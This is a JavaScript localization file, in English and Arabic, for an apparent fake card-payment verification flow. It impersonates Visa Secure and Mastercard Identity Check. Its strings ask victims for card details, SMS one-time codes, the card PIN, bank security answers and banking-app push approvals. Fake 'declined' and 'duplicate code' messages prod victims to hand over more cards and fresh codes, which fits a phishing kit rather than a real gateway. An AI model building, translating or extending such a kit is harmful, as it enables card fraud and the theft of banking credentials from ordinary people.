/**
 * Centralized Internationalization (i18n) for Payment Gateway
 * 
 * Supports:
 *   - English (EN)
 *   - Arabic (AR) with full RTL support
 * 
 * Configured via:
 *   VITE_MODE=standardEN / standardAR
 *   (Also supports aliases: standartEN, standartAR, standard_en, standard_ar, EN, AR)
 */

export function parseLocale(modeString = '') {
  const mode = String(modeString || '').trim().toLowerCase();
  if (mode.endsWith('ar') || mode.includes('_ar') || mode === 'ar' || mode.includes('arabic')) return 'ar';
  return 'en';
}

export const translations = {
  en: {
    dir: 'ltr',
    lang: 'en',
    // Security & Header
    secureConnection: '256-bit TLS Encrypted',
    visaTitle: 'SECURE',
    mcTitle: 'mastercard',
    mcSubtitle: 'Identity Check™',
    visaProtected: 'Protected by Visa Secure',
    mcProtected: 'Secured by Mastercard Identity Check',
    pciDss: 'PCI DSS Level 1',
    threeDs: '3-D SECURE™ 2.2',

    // Transaction details
    authDetails: 'AUTHENTICATION DETAILS',
    merchant: 'Merchant',
    amount: 'Amount',
    cardNumber: 'Card Number',
    storeWebsite: 'Store Website',
    customerEmail: 'Customer Email',

    // Error & Notice
    noticeTitle: 'Authentication Notice',
    declinedCardTitle: 'Payment Authorization Declined',
    declinedCardSubtitle: 'This card was declined by your bank. Please use a different card to complete your reservation.',
    invalidOtp: 'Invalid verification code. Please enter the new SMS code sent to your phone.',
    duplicateOtp: 'You entered this verification code already. Please enter the new SMS code sent to your phone.',
    duplicateCard: 'This card was declined. Please enter a different card.',
    incorrectPin: 'Incorrect PIN. Please check and try again.',

    // OTP Page
    otpTitle: 'Enter Verification Code',
    otpSubtitle: 'A one-time verification code has been sent to your registered mobile number.',
    otpPlaceholder: '••••••',
    timeRemaining: 'Time remaining:',
    confirmAndPay: 'Confirm & Pay',
    resendOtp: 'Resend Code',
    termsConditions: 'Terms and Conditions Apply',
    help: 'Need Help?',

    // Push Page
    pushTitle: 'Approve in Your Banking App',
    pushSubtitle: 'A verification request has been sent to your registered mobile banking device.',
    pushDefaultMsg: 'Please open your mobile banking application and approve the transaction prompt.',
    pushConfirmedBtn: 'I Approved the Notification',

    // PIN Page
    pinTitle: 'Card PIN Verification',
    pinSubtitle: 'Please enter your 4-digit card PIN to authorize this transaction.',
    authorizePayment: 'Authorize Payment',

    // Question Page
    questionTitle: 'Security Verification',
    questionSubtitle: 'Please answer your bank security question to complete authentication.',
    questionPlaceholder: 'Enter your answer',
    submitVerification: 'Submit Verification',

    // Loading Page
    loadingText: 'Verifying securely...',
    loadingSubtext: 'Please do not close this window or press back',

    // Error Page
    errorTitle: 'Transaction Declined',
    errorDesc: 'This transaction could not be authorized by your card issuer. Please contact your bank or try using a different payment card.',
    tryAnotherCard: 'Try Another Card',

    // Front Checkout Form
    fullName: 'Full Name',
    fullNamePlaceholder: 'John Doe',
    email: 'Email Address',
    emailPlaceholder: 'john@example.com',
    expiryDate: 'Expiry Date',
    expiryPlaceholder: 'MM/YY',
    cvv: 'CVV',
    cvvPlaceholder: '123',
    pay: 'Pay Now',
    binBlockedMsg: 'Virtual or prepaid cards are not accepted. Please use a physical credit or debit card.',
    invalidCardNumber: 'Please enter a valid 16-digit card number',
    invalidExpiry: 'Invalid expiry date',
    invalidCvv: 'CVV must be 3 digits'
  },

  ar: {
    dir: 'rtl',
    lang: 'ar',
    // Security & Header
    secureConnection: 'تشفير TLS 256-bit آمن',
    visaTitle: 'SECURE',
    mcTitle: 'mastercard',
    mcSubtitle: 'Identity Check™',
    visaProtected: 'محمي بواسطة فيزا سيكيور',
    mcProtected: 'مؤمن بواسطة ماستركارد آيدينتيتي تشيك',
    pciDss: 'PCI DSS المستوى 1',
    threeDs: '3-D SECURE™ 2.2',

    // Transaction details
    authDetails: 'تفاصيل المعاملة والأمان',
    merchant: 'اسم المتجر',
    amount: 'المبلغ الإجمالي',
    cardNumber: 'رقم البطاقة',
    storeWebsite: 'موقع المتجر',
    customerEmail: 'البريد الإلكتروني',

    // Error & Notice
    noticeTitle: 'إشعار التحقق الأمني',
    declinedCardTitle: 'تم رفض تفويض الدفع',
    declinedCardSubtitle: 'تم رفض هذه البطاقة من قبل البنك المصدر. يرجى استخدام بطاقة مصرفية مختلفة لإتمام عملية الحجز.',
    invalidOtp: 'رمز التحقق غير صحيح. يرجى إدخال رمز التحقق الجديد المرسل إلى هاتفك.',
    duplicateOtp: 'لقد أدخلت رمز التحقق هذا مسبقاً. يرجى إدخال رمز التحقق الجديد المرسل إلى هاتفك.',
    duplicateCard: 'تم رفض هذه البطاقة. يرجى إدخال بطاقة مختلفة.',
    incorrectPin: 'الرقم السري للبطاقة غير صحيح. يرجى المحاولة مرة أخرى.',

    // OTP Page
    otpTitle: 'أدخل رمز التحقق (OTP)',
    otpSubtitle: 'تم إرسال رمز تحقق لمرة واحدة عبر رسالة نصية (SMS) إلى هاتفك المسجل.',
    otpPlaceholder: '••••••',
    timeRemaining: 'الوقت المتبقي:',
    confirmAndPay: 'تأكيد ودفع',
    resendOtp: 'إعادة إرسال الرمز',
    termsConditions: 'الشروط والأحكام',
    help: 'هل تحتاج إلى مساعدة؟',

    // Push Page
    pushTitle: 'الموافقة عبر التطبيق البنكي',
    pushSubtitle: 'تم إرسال إشعار تحقق إلى تطبيق البنك الخاص بك على هاتفك المسجل.',
    pushDefaultMsg: 'يرجى فتح تطبيق البنك والموافقة على طلب تفويض المعاملة.',
    pushConfirmedBtn: 'لقد وافقت على الإشعار في التطبيق',

    // PIN Page
    pinTitle: 'التحقق من الرقم السري للبطاقة',
    pinSubtitle: 'يرجى إدخال الرقم السري المكون من 4 أرقام الخاص ببطاقتك لتفويض الدفع.',
    authorizePayment: 'تفويض الدفع',

    // Question Page
    questionTitle: 'التحقق الأمني الإضافي',
    questionSubtitle: 'يرجى الإجابة على سؤال الأمان البنكي لإتمام عملية الدفع بأمان.',
    questionPlaceholder: 'أدخل إجابتك هنا',
    submitVerification: 'إرسال الإجابة',

    // Loading Page
    loadingText: 'جاري التحقق بأمان وتأكيد المعاملة...',
    loadingSubtext: 'يرجى عدم إغلاق هذه الصفحة أو الضغط على رجوع',

    // Error Page
    errorTitle: 'تم رفض المعاملة',
    errorDesc: 'تعذر تفويض هذه المعاملة من قبل البنك المصدر لبطاقتك. يرجى الاتصال بالبنك أو تجربة بطاقة مصرفية أخرى.',
    tryAnotherCard: 'استخدام بطاقة أخرى',

    // Front Checkout Form
    fullName: 'الاسم الكامل',
    fullNamePlaceholder: 'محمد أحمد',
    email: 'البريد الإلكتروني',
    emailPlaceholder: 'name@example.com',
    expiryDate: 'تاريخ الانتهاء',
    expiryPlaceholder: 'ش/س',
    cvv: 'رمز الأمان (CVV)',
    cvvPlaceholder: '123',
    pay: 'إتمام الدفع الآن',
    binBlockedMsg: 'غير مسموح بالبطاقات الافتراضية أو مسبقة الدفع. يرجى استخدام بطاقة بنكية حقيقية.',
    invalidCardNumber: 'يرجى إدخال رقم بطاقة صحيح مكون من 16 رقماً',
    invalidExpiry: 'تاريخ الانتهاء غير صالح',
    invalidCvv: 'يجب أن يتكون رمز CVV من 3 أرقام فقط'
  }
};

export function getTranslation(modeString) {
  const locale = parseLocale(modeString);
  return translations[locale] || translations.en;
}
